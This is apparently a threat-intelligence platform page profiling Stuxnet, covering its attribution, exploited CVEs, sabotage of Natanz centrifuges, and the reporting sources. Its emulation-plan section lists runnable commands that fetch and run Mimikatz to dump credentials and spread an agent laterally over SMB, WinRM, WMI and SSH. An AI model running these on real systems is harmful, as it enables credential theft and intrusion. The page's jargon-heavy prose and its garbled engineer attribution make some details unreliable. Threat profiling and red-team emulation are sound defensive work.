Home/Threat Actor/Stuxnet
Threat Actor

Stuxnet

stuxnet · us_israel_joint_offensive_cyber · active since 2005

Stuxnet (canonical Symantec malware naming W32.Stuxnet per VirusBlokAda Sergey Ulasen June 17, 2010 canonical first-identification discovery.

US-Israel internal operational naming "the bug" pre-public-identification; canonical operation codename "Olympic Games" per David Sanger NYT June 2012 + book "Confront and Conceal" disclosure) is a malicious computer worm targeting Siemens supervisory control and data acquisition (SCADA) systems controlling Iranian Natanz uranium enrichment facility gas centrifuges, operationally the most historically-canonical cyber operation in publicly- tracked industry analysis, operationally significant as the first publicly-known cyber weapon causing substantial physical damage to industrial infrastructure + first publicly-known nation-state-attributed cyber- sabotage operation against critical industrial infrastructure + first publicly-known programmable logic controller (PLC) rootkit + first publicly-known cyber weapon to use ~4 zero-days in a single operational chain.

operationally attributed to US-Israel joint Operation Olympic Games (canonical David Sanger NYT June 2012 disclosure + book "Confront and Conceal" 2012 based on extensive cited governmental sourcing establishing: Operation Olympic Games origination under Bush 2006 with General James Cartwright + intelligence officials presenting cyber weapon code to Bush as alternative to Israeli conventional military strike, acceleration under Obama administration 2009, US NSA + CIA participation, Israeli Unit 8200 IDF signals intelligence participation.

subsequent Yahoo News September 2, 2019 canonical 5-country intelligence- agency participation disclosure per "five-ring Olympic symbol" framework, US + Israel + Netherlands + Germany + UK or France, including previously-unrevealed AIVD Dutch General Intelligence and Security Service participation with AIVD-recruited Iranian engineer physically introducing Stuxnet via USB drive to air- gapped Natanz facility)

operational target Iranian Natanz Nuclear Facility uranium enrichment program, specifically Siemens S7-300/S7-417 programmable logic controllers + WinCC supervisory control software + Step 7 engineering software controlling IR-1 gas centrifuges; operational physical effect destruction of approximately 1,000 of 5,000 IR-1 gas centrifuges (approximately 20% of Iran's uranium-enriching capability at the time) via signature gas-pumping valve control manipulation overloading centrifuge spinning speed causing overheating and physical destruction, with signature operator-blame- pattern tradecraft (Iranian scientists watching computer screens saw everything normal, intended scientists would be blamed for errors)

4-zero-day operational chain (CVE-2010-2568 LNK shortcut auto-execution + CVE-2010- 2729 Print Spooler + CVE-2010-2743 Kernel Mode Driver privilege escalation + CVE-2010-3338 Task Scheduler privilege escalation + CVE-2008-4250 MS08-067 RPC legacy + CVE-2010-2772 Siemens Step 7 hardcoded password); signature stolen Realtek Semiconductor + JMicron Taiwanese code signing certificates for driver signing operationally bypassing Windows code-integrity enforcement.

air-gapped Natanz facility USB-drive physical-access deployment via AIVD-recruited Iranian engineer.

5 Iranian patient-zero organizations (Behpajooh Co. Elec & Comp. Engineering + Foolad Technic + Neda Industrial Group + Control-Gostar Jahed + Kala Electric per Symantec W32.Stuxnet Dossier canonical analysis Falliere + Murchu + Chien)

Step 7 project file lateral propagation + LAN SMB propagation; programming-error accidental international spread affecting hundreds of thousands of computers worldwide including India + Indonesia + Pakistan operationally leading to VirusBlokAda Sergey Ulasen June 17, 2010 discovery.

canonical Symantec W32.Stuxnet Dossier (Falliere + Murchu + Chien 2010-2011) + Ralph Langner Communications canonical ICS/Siemens PLC analysis 2010-2011 + Kaspersky GReAT Tilded platform attribution December 2011 establishing canonical Stuxnet-Duqu shared-codebase platform attribution (operationally significant cluster-cell coherence with sibling Olympic Games cluster Duqu)

fills the 1st Olympic Games / US-Israel joint cyber-operations cell in the curated corpus and operationally precedes sibling Olympic Games clusters Flame (2nd) + Duqu (3rd), Iran operationally established one of the largest cyber warfare units in the world (tracked separately as Iranian state-sponsored clusters) as direct response operationally significant deterrence-via-adversary- capability-investment effect.

continued industry reference status as canonical "first cyber weapon causing substantial physical damage" baseline operationally cited in essentially all subsequent ICS/SCADA/critical-infrastructure cyber-operation industry analyses through 2010-2026 period.

us_israel_joint_offensive_cyber confidence: high 16 aliases
Sigma rules200 YARA rules8 Live IOCs0 CVEs exploited6

Profile

Stuxnet (canonical Symantec malware naming W32.Stuxnet per VirusBlokAda Sergey Ulasen June 17, 2010 canonical first-identification discovery.

US-Israel internal operational naming "the bug" pre-public-identification; canonical operation codename "Olympic Games" per David Sanger NYT June 2012 + book "Confront and Conceal" disclosure) is a malicious computer worm targeting Siemens supervisory control and data acquisition (SCADA) systems controlling Iranian Natanz uranium enrichment facility gas centrifuges, operationally the most historically-canonical cyber operation in publicly- tracked industry analysis, the first publicly-known cyber weapon causing substantial physical damage, the first publicly-known programmable logic controller (PLC) rootkit, and the first publicly-known nation- state-attributed cyber-sabotage operation against critical industrial infrastructure. Operationally attributed to US-Israel joint Operation Olympic Games per multiple convergent reporting + governmental-source-cited investigative journalism over 2010-2019+ period. Although neither US nor Israel has openly admitted responsibility, multiple independent news organizations claim Stuxnet to be a cyberweapon built jointly by the two countries. Operational phases: (1) OLYMPIC GAMES ORIGINATION (Bush 2006). General James Cartwright + intelligence officials present cyber weapon code to Bush as alternative to Israeli conventional military strike. (2) STUXNET DEVELOPMENT (c. 2005-2009). Multi-year state-actor-tier development cycle. (3) OBAMA ADMINISTRATION ACCELERATION (2009). Obama expands cyberoperation. (4) STUXNET FIRST INSTALLED AT NATANZ (2009). Initial deployment via USB drive physical-access to air-gapped Natanz facility per AIVD-recruited Iranian engineer. (5) ACCIDENTAL INTERNATIONAL SPREAD (2010). Programming error causes Stuxnet to spread beyond Natanz. (6) VIRUSBLOKADA DISCOVERY (June 17, 2010). Sergey Ulasen first identifies Stuxnet. (7) SYMANTEC W32.STUXNET DOSSIER (2010-2011). Falliere + Murchu + Chien canonical comprehensive technical analysis. (8) LANGNER ICS ANALYSIS (2010-2011). Ralph Langner canonical ICS / Siemens PLC analysis. (9) KASPERSKY TILDED PLATFORM ATTRIBUTION (December 2011). Canonical Stuxnet-Duqu shared-codebase platform attribution. (10) DAVID SANGER NYT CANONICAL DISCLOSURE (June 2012). Operation Olympic Games canonical attribution. (11) AIVD DUTCH INTELLIGENCE IRANIAN ENGINEER RECRUITMENT DISCLOSURE (September 2, 2019). Canonical 5-country participation + USB-drive physical-deployment vector disclosure. (12) CONTINUED INDUSTRY REFERENCE STATUS (2010-2026). Canonical "first cyber weapon causing substantial physical damage" industry baseline reference point.

Signature operational tradecraft
  • First publicly-known cyber weapon causing substantial physical damage (cluster-defining): per Sandboxx, operationally inaugurating the cyber-warfare era of substantial physical-damage cyber operations against critical industrial infrastructure.
  • First publicly-known programmable logic controller (PLC) rootkit (cluster-defining): per Wikipedia, "the first to include a programmable logic controller (PLC) rootkit.".
  • 4-zero-day operational chain (cluster-defining): CVE-2010-2568 LNK shortcut auto-execution + CVE-2010- 2729 Print Spooler + CVE-2010-2743 Kernel Mode Driver privilege escalation + CVE-2010-3338 Task Scheduler privilege escalation + CVE-2008-4250 MS08-067 RPC legacy + CVE-2010-2772 Siemens Step 7 hardcoded password. The 4-zero-day operational chain operationally represented the most zero-days deployed in a single operation at the time.
  • Stolen code signing certificates (signature): Realtek Semiconductor + JMicron Taiwanese code signing certificates stolen for driver signing, operationally bypassing Windows code-integrity enforcement.
  • Air-gapped Natanz facility USB-drive deployment: Initial Stuxnet deployment via USB flash drive physical- access deployment vector via AIVD-recruited Iranian engineer per Yahoo News September 2019.
  • 5 Iranian organization patient-zero spread (signature): per Symantec, Behpajooh Co. Elec & Comp. Engineering + Foolad Technic + Neda Industrial Group + Control-Gostar Jahed + Kala Electric.
  • Siemens S7-300 / S7-417 PLC + WinCC SCADA + Step 7 software target (signature): cluster-defining specific ICS target.
  • IR-1 gas centrifuge spinning speed manipulation (signature): cluster-defining sabotage capability, gas-pumping valve control manipulation to overload centrifuge spinning speed causing overheating and physical destruction.
  • Operator-blame-pattern tradecraft (signature): operationally significant subtle sabotage, for Iranian scientists watching computer screens, everything would look normal, intended that scientists would be blamed for the errors.
  • 5-country intelligence-agency participation (signature): Olympic Games codename references five- ring Olympic symbol representing intelligence agencies of 5 countries, US (NSA + CIA) + Israel (Unit 8200) + Netherlands (AIVD) + Germany + UK or France.
  • Programming-error accidental international spread (signature): hundreds of thousands of computers worldwide accidental infection, operationally led to Stuxnet public discovery.
  • ~1,000 of 5,000 IR-1 centrifuges destroyed (signature physical effect): approximately 20% of Iran's uranium-enriching capability at the time.
  • Tilded platform shared codebase with Duqu (signature): per Kaspersky December 2011, operationally significant cluster-cell coherence with sibling Olympic Games cluster Duqu. The cluster fills the 1st Olympic Games / US-Israel joint cyber-operations cell in this curated corpus. Operationally significant as the canonical "first cyber weapon causing substantial physical damage" industry reference point cited as comparative baseline in essentially all subsequent ICS / SCADA / critical- infrastructure cyber-operation industry analyses.

Aliases

16
stuxnetstuxnet wormw32_stuxnetw32.stuxnetstuxnet ics scada wormoperation_olympic_gamesoperation olympic gamesolympic_games_operationolympic gamesthe bugw32.stuxnet dossierstuxnet natanzstuxnet siemens plcfirst cyber weapon physical damageus israel joint cyber sabotage iran nuclearir-1 centrifuge sabotage

Adversary Emulation Plan

13 steps
Runnable Caldera emulation profile Worm - Move laterally any way possible. Ordered along the attack lifecycle; each step maps to an ATT&CK technique with a concrete executor command. For authorized red-team / purple-team exercises only.
0 collection T1005 · Data from Local System darwin, linux
Parse SSH config
pip install stormssh && storm list
1 credential-access T1552.003 · Unsecured Credentials: Bash History darwin, linux
Dump history
find ~/.bash_sessions -name '*' -exec cat {} \; 2>/dev/null
2 discovery T1135 · Network Share Discovery windows
View admin shares
Get-SmbShare | ConvertTo-Json
3 discovery T1018 · Remote System Discovery darwin, linux, windows
Collect ARP details
arp -a
4 credential-access T1003.001 · OS Credential Dumping: LSASS Memory windows
Run PowerKatz
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };
$web = (New-Object System.Net.WebClient);
$result = $web.DownloadString("https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/4c7a2016fc7931cd37273c5d8e17b16d959867b3/Exfiltration/Invoke-Mimikatz.ps1");
iex $result; Invoke-Mimikatz -DumpCreds
5 discovery T1018 · Remote System Discovery windows
Find Hostname
nbtstat -A #{remote.host.ip}
6 discovery T1018 · Remote System Discovery windows
Reverse nslookup IP
nslookup #{remote.host.ip}
7 lateral-movement T1021.002 · Remote Services: SMB/Windows Admin Shares windows
Mount Share
net use \\#{remote.host.fqdn}\C$ /user:#{domain.user.name} #{domain.user.password}
8 lateral-movement T1021.002 · Remote Services: SMB/Windows Admin Shares windows
Copy 54ndc47 (SMB)
$path = "sandcat.go-windows";
$drive = "\\#{remote.host.fqdn}\C$";
Copy-Item -v -Path $path -Destination $drive"\Users\Public\s4ndc4t.exe";
9 lateral-movement T1570 · Lateral Tool Transfer windows, darwin, linux
Copy 54ndc47 (WinRM and SCP)
$job = Start-Job -ScriptBlock {
  $username = "#{domain.user.name}";
  $password = "#{domain.user.password}";
  $secstr = New-Object -TypeName System.Security.SecureString;
  $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
  $cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
  $session = New-PSSession -ComputerName "#{remote.host.name}" -Credential $cred;
  $location = "#{location}";
  $exe = "#{exe_name}";
  Copy-Item $location -Destination "C:\Users\Public\svchost.exe" -ToSession $session;
  Start-Sleep -s 5;
  Remove-PSSession -Session $session;
};
Receive-Job -Job $job -Wait;
10 execution T1047 · Windows Management Instrumentation windows
Start 54ndc47 (WMI)
$node = '''#{remote.host.fqdn}''';
$user = '''#{domain.user.name}''';
$password = '''#{domain.user.password}''';
wmic /node:$node /user:$user /password:$password process call create "powershell.exe C:\Users\Public\s4ndc4t.exe -server #{server} -group #{group}";
11 lateral-movement T1021.006 · Remote Services: Windows Remote Management windows
Start Agent (WinRM)
$username = "#{domain.user.name}";
$password = "#{domain.user.password}";
$secstr = New-Object -TypeName System.Security.SecureString;
$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};
$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;
$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;
Invoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\Users\Public\svchost.exe -server #{server} }};
Start-Sleep -s 5;
Remove-PSSession -Session $session;
12 lateral-movement T1021.004 · Remote Services: SSH darwin, linux
Start 54ndc47
scp -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 sandcat.go-darwin #{remote.ssh.cmd}:~/sandcat.go &&
ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -o ConnectTimeout=3 #{remote.ssh.cmd} 'nohup ./sandcat.go -server #{server} -group red 1>/dev/null 2>/dev/null &'

Notable Campaigns

13
2019AIVD Dutch Intelligence Iranian Engineer Recruitment Disclosure (September 2, 2019)
2012David Sanger NYT Canonical Olympic Games Disclosure (June 2012)
2011Kaspersky Tilded Platform Attribution (December 2011)
2010-2026Continued Industry Reference Status (2010-2026)
2010-2011Symantec W32.Stuxnet Dossier Canonical Analysis (September 2010 - February 2011)
2010-2011Ralph Langner ICS Analysis (2010-2011)
2010Stuxnet VirusBlokAda Discovery (June 17, 2010)
2010Stuxnet Accidental International Spread (2010)
2009-2010Stuxnet Physical Damage Assessment, 1,000 IR-1 Centrifuges (2009-2010)
2009Stuxnet First Installed at Natanz (2009)
2009Stuxnet Obama Administration Acceleration (2009)
2006Operation Olympic Games Origination (Bush 2006)
2005-2009Stuxnet Development (c. 2005-2009)

Attribution & Reporting

Key reporting
reportSymantec (Nicolas Falliere + Liam O Murchu + Eric Chien): W32.Stuxnet Dossier (September 2010 - February 2011 v1.4), canonical Stuxnet technical analysis
reportLangner Communications (Ralph Langner): Stuxnet ICS / Siemens PLC analysis (2010-2011), canonical industrial-control-system domain expert analysis
reportKaspersky Lab GReAT: Stuxnet + Tilded platform attribution (December 2011), canonical Stuxnet-Duqu shared-codebase attribution
reportVirusBlokAda (Sergey Ulasen): First Stuxnet identification (June 17, 2010), canonical Stuxnet discovery
reportCrySyS Lab Budapest: Stuxnet adjacent analysis (2011)
reportF-Secure (Mikko Hyppönen): Stuxnet historical analysis
reportMAHER Center Iranian National CERT: Stuxnet Iranian impact analysis
reportIran Atomic Energy Organization: Natanz facility damage acknowledgment
reportDavid Sanger (New York Times): Obama Order Sped Up Wave of Cyberattacks Against Iran (June 1, 2012), canonical Olympic Games disclosure
reportDavid Sanger: Confront and Conceal, Obama's Secret Wars and Surprising Use of American Power (book, 2012), canonical Olympic Games book-length disclosure
reportYahoo News (Kim Zetter + Huib Modderkolk): Revealed, How a Secret Dutch Mole Aided the US-Israeli Stuxnet Cyber Attack on Iran (September 2, 2019), canonical 5-country participation + AIVD Dutch intelligence Iranian engineer recruitment disclosure
reportKim Zetter: Countdown to Zero Day, Stuxnet and the Launch of the World's First Digital Weapon (book, 2014), canonical comprehensive book-length analysis
reportMandiant / Google Threat Intelligence Group: Stuxnet historical context
reportMITRE ATT&CK Software S0603: Stuxnet
reportMalpedia Software Profile: Stuxnet

Operational

State sponsor

United States + Israel joint offensive cyber operation attributed via multiple convergent reporting + leak + governmental-source-cited investigative journalism over 2010-2019+ period. Although neither the United States nor Israel has openly admitted responsibility, multiple independent news organizations claim Stuxnet to be a cyberweapon built jointly by the two countries in a collaborative effort known as Operation Olympic Games per Wikipedia canonical compilation. Canonical Olympic Games attribution timeline: (1) David Sanger NYT June 2012 canonical disclosure: David Sanger published canonical Olympic Games disclosure series in New York Times articles + subsequent book "Confront and Conceal: Obama's Secret Wars and Surprising Use of American Power" (2012). Sanger's reporting based on extensive cited governmental sourcing established canonical operational facts: (a) Operation Olympic Games origination under George W. Bush administration 2006; (b) acceleration under Obama administration.

(c) US- Israel joint development.

(d) NSA + CIA US participation; (e) Unit 8200 IDF Israeli participation. (2) General James Cartwright role: per Wikipedia: "During president Bush's second term, General James Cartwright, then head of United States Strategic Command, along with other intelligence officials presented Bush with sophisticated code that would act as an offensive cyber weapon." Cartwright subsequently faced US Justice Department investigation for alleged Stuxnet-related leak to David Sanger (2016 deal, pardoned by Obama 2017). (3) Five-country intelligence-agency participation (signature): per Yahoo News September 2019 + GlobalSecurity + Tribune India compilation: "The operation received the codename 'Olympic Games', reportedly a reference to the five-ring Olympic symbol representing the intelligence agencies of five countries involved: the United States, Israel, the Netherlands, Germany, and either the United Kingdom or France." Per Yahoo News September 2, 2019 reporting: AIVD (Dutch intelligence service) recruited an Iranian engineer (Erik van Sabben / unnamed) who operationally introduced Stuxnet via USB drive to air-gapped Natanz facility. Operationally significant attribution depth not common in cyber-operation attribution analysis. (4) US strategic justification per Bush administration: Bush believed cyber-sabotage strategy was the only way to prevent an Israeli conventional military strike on Iranian nuclear facilities (analogous to Israel's 2007 Operation Orchard airstrike on Syrian Al-Kibar nuclear research building). Operationally significant strategic- coercion-deterrence operational mission objective. (5) Israeli operational essentiality: per Global Security: "Israel possessed deep intelligence about operations at Natanz that would be vital to making the cyber attack succeed. Israeli intelligence, particularly the elite signals intelligence unit known as Unit 8200, had cultivated sources within Iran's nuclear program and maintained sophisticated technical surveillance of Iranian activities." Operational mission objective: disrupt / sabotage / delay Iranian uranium enrichment program at Natanz Nuclear Facility, specifically sabotage of gas centrifuges used for uranium enrichment via covert Siemens Step 7 programmable logic controller (PLC) manipulation while displaying normal readings to facility operators (operationally significant operator-blame-pattern tradecraft design). Operational delivery + spread: (a) Air-gapped Natanz facility USB-drive deployment: Natanz facility operationally air-gapped (not connected to internet). Initial Stuxnet deployment via USB flash drive physical-access deployment vector. Per AIVD Dutch intelligence service-recruited Iranian engineer reporting (Yahoo News September 2019): an Iranian engineer recruited by AIVD physically introduced Stuxnet via USB drive to Natanz operationally critical facility-internal computer systems. (b) Five Iranian organization patient-zero spread: per Symantec W32.Stuxnet Dossier canonical analysis (Nicolas Falliere + Liam O Murchu + Eric Chien February 2011 v1.4): five Iranian organizations identified as initial-patient-zero deployment targets: Behpajooh Co. Elec & Comp. Engineering + Foolad Technic + Neda Industrial Group + Control-Gostar Jahed + Kala Electric. Stuxnet operationally designed to propagate from initial-patient-zero organizations to Natanz operationally-air-gapped facility via USB drives + LAN propagation + Step 7 project file infection. (c) Programming-error accidental international spread: per Wikipedia + Sanger: programming error in the malware caused it to spread beyond Natanz when an engineer connected his work computer to the internet. Code was supposed to recognize when it had left the target environment and cease replicating, but the recognition protocol failed. Malware began spreading across the internet, infecting hundreds of thousands of computers worldwide, operationally significant accident that operationally led to Stuxnet public discovery. (d) VirusBlokAda Sergey Ulasen June 2010 discovery circumstances: per Global Security: "An Iranian company unconnected to the nuclear program experienced mysterious computer problems, system crashes, blue screens of death, and unusual behavior even after fresh operating system installations. The firm's security specialist contacted a friend working for VirusBlokAda, a Belarusian antivirus company. Sergey Ulasen, who was at a wedding reception when he received the call, spent the evening on the phone with his Iranian contact trying to diagnose the problem." Stuxnet was first uncovered on June 17, 2010, operationally significant for establishing the canonical "Stuxnet discovered" date. Operational physical effect: Stuxnet operationally caused destruction of approximately 1,000 of 5,000 IR-1 gas centrifuges at Natanz nuclear facility, operationally constituting approximately 20% of Iran's uranium-enriching capability at the time. Per Wikipedia: "The malicious software temporarily halted approximately 1,000 of the 5,000 centrifuges from spinning at Natanz." Per Sandboxx + National Interest: Stuxnet manipulated centrifuge gas-pumping valve control to overload centrifuge spinning speed causing overheating and physical destruction, while displaying normal readings to facility operators. Operationally first publicly-known instance in history in which a cyberweapon had substantial physical effects on a target of great geopolitical interest per Sandboxx. Operational classification: nation-state-tier cyber- sabotage operation representing the most historically- canonical cyber operation in publicly-tracked industry analysis, operationally significant as inaugurating the cyber-warfare era of substantial physical-damage cyber operations against critical industrial infrastructure. The cluster fills the 1st Olympic Games / US-Israel joint cyber-operations cell in this curated corpus. Operationally significant as the canonical "first cyber weapon causing substantial physical damage" industry reference point.

Motivations
iranian_uranium_enrichment_program_disruption_via_centrifuge_sabotage, prevention_of_israeli_conventional_military_strike_against_iran_nuclear_facilities, first_cyber_weapon_substantial_physical_damage_capability_demonstration, us_israel_joint_offensive_cyber_capability_demonstration, ics_scada_industrial_control_system_targeting_capability_demonstration, programmable_logic_controller_plc_rootkit_capability_demonstration, covert_strategic_coercion_via_cyber_sabotage_replacing_kinetic_strike, operator_blame_pattern_subtle_sabotage_tradecraft
Sectors
critical_infrastructure_uranium_enrichmentics_scada_industrial_control_systemsnuclear_facilitiessiemens_step_7_plc_industrial_systemsgas_centrifuge_uranium_enrichment_systemsair_gapped_industrial_networkspatient_zero_iranian_contractor_organizationstechnology_engineering_contractors
Regions
iraniranian_nuclear_programnatanz_nuclear_facilityglobal_accidental_spread_post_2010indiaindonesiapakistan

Techniques Used

60
T0807T0813T0814T0815T0816T0820T0826T0828T0831T0832T0836T0843T0846T0853T0855T0858T0859T0866T0867T0872T0881T0883T0889T0890T0891T0894T1003T1003.002T1005T1010T1014T1016T1021T1021.002T1021.006T1027T1027.002T1027.003T1027.005T1027.009T1033T1036T1036.001T1036.005T1039T1053T1056T1057T1059T1068T1070T1070.004T1071T1071.001T1074T1078T1082T1083T1087T1091

Detection Blind Spots

60 techniques
Across this actor’s 60 mapped techniques, the share covered by each detection layer. Low bars are where you’d be blind if this actor targeted you.
Behavioral / log (Sigma)33/60 · 55%
Analytics (MITRE CAR)19/60 · 31%
Runtime / container (Falco)4/60 · 6%
File / malware (YARA)0/60 · 0%
Network (Suricata/Snort)9/60 · 15%
Vuln scan (Nuclei)0/60 · 0%

Atomic Test Plan

23 techniques
Runnable Atomic Red Team tests covering this actor’s mapped techniques - validate your detections against this specific adversary. Cross-reference the blind spots above. For authorized lab / purple-team use. Open the full builder

Tools Used

0 mapped
Other tooling / TTPs (curation, not ATT&CK-mapped):
SIEMENS S7-300 S7-400 PLC TARGETSTEP 7 PROJECT FILE LATERAL PROPAGATIONSTUXNET LADDER LOGIC PAYLOADSTUXNET STEP7 PLC ROOTKITSTUXNET WINDOWS COMPONENTSSTUXNET WORM

CVEs Exploited

6
CVECVE-2008-4250
CVECVE-2010-2568
CVECVE-2010-2729
CVECVE-2010-2743
CVECVE-2010-2772
CVECVE-2010-3338
Intelligence Graph · click any node to traverse
CVETechnique ActorTool Family
drag to reposition · click any node to traverse · button top-right enlarges
External lookups - second-class, for what we don’t hold ourselves
MITRE searchMalpediaGoogle
Vulnerabilities
CISA KEV catalog
CWE weaknesses
CAPEC attack patterns
Package vulnerabilities
Threat intelligence
Threat actors
Tools & malware
ATT&CK techniques
IOCs
Detection & defense
Sigma rules
YARA rules
Atomic Red Team tests
D3FEND countermeasures
Compliance
NIST 800-53
ISO 27001:2022
SOC 2 TSC
PCI-DSS v4.0
CIS Controls v8.1
About
All capabilities
Live statistics
Data sources
Privacy policy
Terms of service
threatengine.sh  ·  Open-source threat intelligence platform  ·  100+ authoritative sources  ·  Every fact traces to its origin